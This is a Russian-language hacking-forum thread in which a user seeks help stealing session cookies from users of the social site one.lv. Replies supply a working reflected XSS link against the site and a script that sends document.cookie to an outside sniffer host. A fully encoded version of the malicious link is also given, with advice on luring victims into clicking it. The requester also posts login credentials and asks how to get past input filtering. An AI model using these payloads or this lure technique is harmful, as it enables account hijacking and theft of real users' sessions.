Здраствуйте пользователи форума античат, прошу вас о помощи встроики сниффа в сообщение. Проблема: На сайте one.lv есть страница знакомства ну и там типо чат. На некоторых страницах открывается сессионид, с помощью него можно зайти на аккоунт жертвы. Я хочу узнать теги с помощю которых посылать сообщение (чтобы в сообщение прошла картинка), и тем самым одолжить у жертвы сессионид Пробывал вставлять теги типа: <a href=""> <img src=""> и так бб коды, сайт шлёт их как текст и не выполняет тег. Вот скрипт окна каторый я смог взять т.к. на сайте некоторые данные не защещины и стоит ввести только дир файла и перед вами скрипт... Сам скрипт Язык я этот плохо знаю но я увидел там тексто замену... но эту функцию найти не смог. Логин: offone Пароль: kazdanga10 Прошу пожалуйсто помоч, если конечно это возможно (я уверен что возможно) Скажите тег с помщью каторого я смогу отослать снифф картинку. Спасибо за внимание.
Это отправляется как текст, если не трудно зайди пожалуйсто на сайт и посмотри(проверь) Наведи на человека с ником: Ви. И отправь ему сообщение, затем отправленные сообщения можно посмотреть слева в столбце.
XSS после входа под регарым юзером. Это выведет простой алерт. Нет ничего сложного немного доработать и увести кукисы. Только надо юзеру впарить нужную ссылку и попросить нажать )
Неплохо спасибо, но мне бы отослать лучше сниффер... так незаметней. Допустим я отсылаю сообщение а с ним и сниффер каторый мне отдает сессионид, и некакого палева... а так я спрошу зайди на ссылку плзз плззз )) Да еще я сегодня увидел то что <> он отфильтровывает и ставит вместо <> есть идеи? до самой функции реплаце я не добрался... Как же обойти фильтр...
гыгы. ты терминологией не владеешь почти. тебе все дали уже. Все теги идут текстом, потому что специально для таких как ты на сайтах ставят фильтры, которые не дают спионерить чужие данные. Тебе дали пассивную XSS то есть теперь ты должен каким-либо образом заманить на нее нужного тебе пользователя. то есть: Code: <script>img = new Image(); img.src = "http://site.ru/sniffer/s.gif?"+document.cookie;</script> http://c5.one.lv/navigate.do?st.id=community.ownfriends.page&st.friends.fl.search=%22%3E%3Cscript%3Ealert%28"XSS"%29%3C%2Fscript%3E тесно связаны. первое нужно подставить во второе и заставить юзера пройти по полученной ссылке или еще каким-либо образом. Сниффер есть на античате. если хочешь, я могу помочь тебе с пассивкой, но следить за сесией и кукисами на сниффере тебе придется самому.
Code: http://c5.one.lv/navigate.do?st.id=community.ownfriends.page&st.friends.fl.search=%22%3E%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E вот такой линк можно подсунуть юзверю с возгласом "смари че я нашел" а потом ждать его кукисы здесь : http://old.antichat.ru/sniff/log.php если злоеб*чий джино заработает, я упрощу тебе задачу) PS: обрати внимание, что форум разрезал эту ссылку ===== ЗЗЫ кстати. не прошибает ЗЗЗЫ ачатовский сниффер лагает?))
